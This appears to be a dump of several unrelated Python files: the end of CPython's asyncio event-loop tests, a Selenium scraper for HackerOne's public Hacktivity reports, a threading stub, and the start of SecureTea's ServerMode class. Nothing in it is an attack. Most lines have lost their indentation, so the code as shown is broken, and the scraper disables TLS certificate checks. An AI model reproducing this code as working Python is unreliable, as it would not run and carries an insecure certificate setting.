# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
        with self.assertWarns(DeprecationWarning):
            _, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
async def connect(**kwds):
await self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
async def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
await self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
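# Concrete event-loop test classes are declared per platform: the selector and
# proactor loops on Windows, and one selector-based class for each selector
# available on POSIX (kqueue, epoll, poll, select).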
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
            # than 10.9 (Mavericks)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
            # than 10.9 (Mavericks)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
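# Handle tests: construction, cancellation, weak references and repr
# formatting of asyncio.Handle, with and without debug mode.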
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
h.cancel()
self.assertTrue(h.cancelled())
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
with self.assertWarns(DeprecationWarning):
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
@unittest.skipUnderCinderJIT("Invalid stack traces (T86183012)")
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
@unittest.skipUnderCinderJIT("Invalid stack traces (T86183012)")
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
        h = loop.call_at(loop.time(), noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
        # collections.abc.Coroutine, but lack cr_code or gi_code attributes
# (such as ones compiled with Cython).
coro = CoroLike()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro.__name__ = coro.__qualname__ = None
self.assertEqual(coroutines._format_coroutine(coro),
'<CoroLike without __name__>() running')
coro = CoroLike()
coro.__qualname__ = 'CoroLike'
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'CoroLike()')
coro = CoroLike()
coro.__qualname__ = 'AAA'
coro.cr_code = None
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
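# TimerHandle tests: hashing, when(), cancellation, repr and the rich
# comparison operators.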
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_when(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(when, h.when())
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
# cancel
h.cancel()
self.assertTrue(h.cancelled())
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
@unittest.skipUnderCinderJIT("Invalid stack traces (T86183012)")
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
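# AbstractEventLoop is purely abstract: every method, plain or coroutine,
# must raise NotImplementedError.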
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
def test_not_implemented_async(self):
async def inner():
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
with self.assertRaises(NotImplementedError):
await loop.run_in_executor(f, f)
with self.assertRaises(NotImplementedError):
await loop.getaddrinfo('localhost', 8080)
with self.assertRaises(NotImplementedError):
await loop.getnameinfo(('localhost', 8080))
with self.assertRaises(NotImplementedError):
await loop.create_connection(f)
with self.assertRaises(NotImplementedError):
await loop.create_server(f)
with self.assertRaises(NotImplementedError):
await loop.create_datagram_endpoint(f)
with self.assertRaises(NotImplementedError):
await loop.sock_recv(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_recv_into(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_sendall(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_connect(f, f)
with self.assertRaises(NotImplementedError):
await loop.sock_accept(f)
with self.assertRaises(NotImplementedError):
await loop.sock_sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.connect_read_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.connect_write_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.subprocess_shell(f, mock.sentinel)
with self.assertRaises(NotImplementedError):
await loop.subprocess_exec(f)
loop = asyncio.new_event_loop()
loop.run_until_complete(inner())
loop.close()
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
class GetEventLoopTestsMixin:
_get_running_loop_impl = None
_set_running_loop_impl = None
get_running_loop_impl = None
get_event_loop_impl = None
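    # Subclasses below (TestPyGetEventLoop and, when _asyncio is importable,
    # TestCGetEventLoop) plug in either the pure-Python or the C-accelerated
    # implementations of these accessors, so the same tests exercise both.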
def setUp(self):
self._get_running_loop_saved = events._get_running_loop
self._set_running_loop_saved = events._set_running_loop
self.get_running_loop_saved = events.get_running_loop
self.get_event_loop_saved = events.get_event_loop
events._get_running_loop = type(self)._get_running_loop_impl
events._set_running_loop = type(self)._set_running_loop_impl
events.get_running_loop = type(self).get_running_loop_impl
events.get_event_loop = type(self).get_event_loop_impl
asyncio._get_running_loop = type(self)._get_running_loop_impl
asyncio._set_running_loop = type(self)._set_running_loop_impl
asyncio.get_running_loop = type(self).get_running_loop_impl
asyncio.get_event_loop = type(self).get_event_loop_impl
super().setUp()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
if sys.platform != 'win32':
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
try:
if sys.platform != 'win32':
asyncio.set_child_watcher(None)
super().tearDown()
finally:
self.loop.close()
asyncio.set_event_loop(None)
events._get_running_loop = self._get_running_loop_saved
events._set_running_loop = self._set_running_loop_saved
events.get_running_loop = self.get_running_loop_saved
events.get_event_loop = self.get_event_loop_saved
asyncio._get_running_loop = self._get_running_loop_saved
asyncio._set_running_loop = self._set_running_loop_saved
asyncio.get_running_loop = self.get_running_loop_saved
asyncio.get_event_loop = self.get_event_loop_saved
if sys.platform != 'win32':
def test_get_event_loop_new_process(self):
# bpo-32126: The multiprocessing module used by
# ProcessPoolExecutor is not functional when the
# multiprocessing.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
async def main():
pool = concurrent.futures.ProcessPoolExecutor()
result = await self.loop.run_in_executor(
pool, _test_get_event_loop_new_process__sub_proc)
pool.shutdown()
return result
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
def test_get_event_loop_returns_running_loop(self):
class TestError(Exception):
pass
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise TestError
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio.get_running_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
asyncio.set_event_loop(loop)
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
class TestPyGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._py__get_running_loop
_set_running_loop_impl = events._py__set_running_loop
get_running_loop_impl = events._py_get_running_loop
get_event_loop_impl = events._py_get_event_loop
try:
import _asyncio # NoQA
except ImportError:
pass
else:
class TestCGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._c__get_running_loop
_set_running_loop_impl = events._c__set_running_loop
get_running_loop_impl = events._c_get_running_loop
get_event_loop_impl = events._c_get_event_loop
class TestServer(unittest.TestCase):
def test_get_loop(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
proto = MyProto(loop)
server = loop.run_until_complete(loop.create_server(lambda: proto, '0.0.0.0', 0))
self.assertEqual(server.get_loop(), loop)
server.close()
loop.run_until_complete(server.wait_closed())
class TestAbstractServer(unittest.TestCase):
def test_close(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().close()
def test_wait_closed(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
with self.assertRaises(NotImplementedError):
loop.run_until_complete(events.AbstractServer().wait_closed())
def test_get_loop(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().get_loop()
if __name__ == '__main__':
unittest.main()
|
scrapper.py
|
import sys
import requests
import time
import threading
import termplotlib as tpl
from collections import defaultdict
from collections import OrderedDict
from bs4 import BeautifulSoup
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.support.ui import WebDriverWait
## ---------------- LOGO ---------------- ##
print(r"""
_ _
| | | |
| |__ __ _ ___| | _____ _ __ ___ _ __ ___ ___ ___ _ __ __ _ _ __ ___ _ __
| '_ \ / _` |/ __| |/ / _ \ '__/ _ \| '_ \ / _ \ / __|/ __| '__/ _` | '_ \ / _ \ '__|
| | | | (_| | (__| < __/ | | (_) | | | | __/ \__ \ (__| | | (_| | |_) | __/ |
|_| |_|\__,_|\___|_|\_\___|_| \___/|_| |_|\___| |___/\___|_| \__,_| .__/ \___|_|
| |
|_|
""")
## ---------------- Functions ---------------- ##
def loading():
    loading_thread = threading.current_thread()
while getattr(loading_thread, "loading_loop", True):
print ("Loading ",end='\r')
time.sleep(1) #do some work here...
print ("Loading. ",end='\r')
time.sleep(1) #do some more work here...
print ("Loading.. ",end='\r')
time.sleep(1) #do even more work...
print ("Loading...",end='\r')
time.sleep(1)
print ("[ * ] Hactivity page scrolling complete.")
def scroll_down(driver):
"""Scrolling the page for pages with infinite scrolling"""
loading_thread = threading.Thread(target=loading)
loading_thread.start()
# Get scroll height.
last_height = driver.execute_script("return document.body.scrollHeight")
while True:
# Scroll down to the bottom.
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
# Wait to load the page.
time.sleep(5)
# Calculate new scroll height and compare with last scroll height.
new_height = driver.execute_script("return document.body.scrollHeight")
if new_height == last_height:
break
last_height = new_height
loading_thread.loading_loop = False
loading_thread.join()
def hackerone_search(query, webdriver, report_directory_dictionary, bug_bounty_names):
search_param = query
options = webdriver.ChromeOptions()
options.add_argument('--ignore-certificate-errors')
options.add_argument('--headless')
options.add_argument("--enable-javascript")
webdriver = webdriver.Chrome(ChromeDriverManager().install(), options=options)
url = "https://hackerone.com/hacktivity?querystring=" + search_param
with webdriver as driver:
# Set timeout time
wait = WebDriverWait(driver, 1)
        # retrieve the URL in the headless browser
driver.get(url)
print("[ * ] Scrolling the page due to infinite scrolling")
scroll_down(driver)
page_source = driver.page_source
soup = BeautifulSoup(page_source, 'html.parser')
driver.close()
## Find the total number of reports
results = soup.find(class_='vertical-spacing vertical-spacing--large vertical-spacing--top')
job_elems = results.find_all('div',class_='grid__column grid__column--four-fifths')
num_results_text = "" #Tracks the total number of reports for the specific Hacktivity query
for job in job_elems:
lookingfor = job.find('h3', class_='daisy-h3 no-margin')
num_results_text = lookingfor.text
#Number of results - int
num_reports = int("".join(filter(str.isdigit, num_results_text))) #Extracts only the digit and nothing else
if (num_reports != 0):
fades = soup.find_all(class_='fade fade--show')
for fade in fades:
report_title_cards = fade.find(class_='sc-gsTCUz fZiDzA spec-hacktivity-content')
# Retrieving report links and directory and adding them into a dictionary
## ---------------- Retrieving directory ---------------- ##
report_directory_str = fade.find(class_='daisy-link routerlink daisy-link daisy-link--major').text
## ---------------- Retrieving links ---------------- ##
if (report_title_cards.find('a', {'class': 'daisy-link ahref daisy-link hacktivity-item__publicly-disclosed spec-hacktivity-item-title'}) != None):
report_link = report_title_cards.find('a', {'class': 'daisy-link ahref daisy-link hacktivity-item__publicly-disclosed spec-hacktivity-item-title'}).attrs['href']
report_title = report_title_cards.find(class_="daisy-link ahref daisy-link hacktivity-item__publicly-disclosed spec-hacktivity-item-title") # Hacktivity report title -> Type of vulns
elif (report_title_cards.find('a', {'class': 'daisy-link ahref daisy-link hacktivity-item__hacker-published spec-hacktivity-item-title'}) != None):
report_link = report_title_cards.find('a', {'class': 'daisy-link ahref daisy-link hacktivity-item__hacker-published spec-hacktivity-item-title'}).attrs['href']
report_title = report_title_cards.find(class_="daisy-link ahref daisy-link hacktivity-item__hacker-published spec-hacktivity-item-title") # Hacktivity report title -> Type of vulns
## ---------------- Add info to dictionary ---------------- ##
## Dictionary Key ==> Bug Bounty Program (BBP)
## Dictionary Value ==> Report Links for each (BBP)
report_directory_dictionary[report_directory_str].append(report_link)
bar_graph_label = [] #All the keys resides here
num_reports_list = [] #Number of values for each key resides here
index = 1
for k in report_directory_dictionary:
bug_bounty_names.append(k)
num_reports_list.append(len(report_directory_dictionary[k]))
label_str = str(index) + ") " + k
index += 1
bar_graph_label.append(label_str)
print("There are a total of " + str(len(report_directory_dictionary)) + " different directories.")
print("There are a total of " + str(num_reports) + " different reports.")
## ---------------- Plot Graph ---------------- ##
fig = tpl.figure()
fig.barh(
num_reports_list, # Amount per label
bar_graph_label, # Label
force_ascii = True
)
fig.show()
from selenium import webdriver
input_loop("Which bug bounty program would you like to navigate to? Or you can make another search.\n", webdriver, report_directory_dictionary, bug_bounty_names)
else:
from selenium import webdriver
print("There are a total of 0 bug bounty programs with that search.")
report_directory_dictionary = defaultdict(list)
input_loop("Enter your command. For list of command, use 'help'.\n", webdriver, report_directory_dictionary, bug_bounty_names)
def input_loop(input_command, driver, report_directory_dictionary, bug_bounty_names):
while True:
user_input_str = input(input_command)
command = user_input_str.split(' ', 1)[0]
if (command == "search"):
arguments = user_input_str.split(' ', 1)[1]
hackerone_search(arguments, driver, report_directory_dictionary, bug_bounty_names)
break
elif (command.isnumeric()):
if (len(report_directory_dictionary) == 0):
print("Sorry but there are no reports for scraping.\n")
else:
key = bug_bounty_names[int(command) - 1]
print(key)
for reports in report_directory_dictionary[key]:
print(reports)
elif (command == "quit" or command == "exit"):
print("Goodbye!")
exit()
else:
print("No such command. Try using 'help'.\n")
## ---------------- Main code ---------------- ##
report_directory_dictionary = defaultdict(list)
bug_bounty_names = []
input_loop("Enter your command. For list of command, use 'help'.\n", webdriver, report_directory_dictionary, bug_bounty_names)
|
connect.py
|
import threading
#----------------------------------------------------------------------------------
"""Create a thread to handle the logging in of a user into an email system
"""
#----------------------------------------------------------------------------------
def connectToMailSystem():
"""thread worker function"""
    print('Worker\n')
return
threads = []
t = threading.Thread(target=connectToMailSystem)
threads.append(t)
t.start()
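# Illustrative follow-up (not in the original snippet): the threads list keeps
# the handles so the caller could wait for the workers to finish, e.g.
#   for t in threads:
#       t.join()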
|
server_mode.py
|
# -*- coding: utf-8 -*-
u"""Server Mode for SecureTea.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Author: Abhishek Sharma <abhishek_official@hotmail.com> , Jul 28 2019
Version: 1.5.1
Module: SecureTea
"""
# Import all the modules necessary for server mode
from securetea.lib.ids import secureTeaIDS
from securetea.lib.waf.Server import SecureTeaWaf
from securetea.lib.log_monitor.system_log import engine
from securetea.lib.log_monitor.server_log.secureTeaServerLog import SecureTeaServerLog
from securetea.lib.auto_server_patcher.secureTeaServerPatcher import SecureTeaAutoServerPatcher
from securetea.lib.web_deface.secureTeaWebDeface import WebDeface
from securetea.lib.antivirus.secureTeaAntiVirus import SecureTeaAntiVirus
from securetea.lib.firewall import secureTeaFirewall
from securetea import logger
import multiprocessing
import sys
class ServerMode(object):
"""ServerMode class."""
def __init__(self, debug=False, cred=None):
"""
Initialize ServerMode.
Args:
debug (bool): Log on terminal or not
cred (dict): Configuration credentials
Raises:
None
        Returns:
None
"""
self.debug = debug
# Initialize logger
self.logger = logger.SecureTeaLogger(
__name__,
debug=self.debug
)
# Initialize credentials
if cred is not None:
self.cred = cred
else:
self.logger.log(
"No configuraton parameters found, exiting",
logtype="error"
)
sys.exit(0)
# Initialize objects presence as false
self.firewall = False
        self.waf = False
self.ids = False
self.antivirus = False
self.auto_server_patcher = False
self.web_deface = False
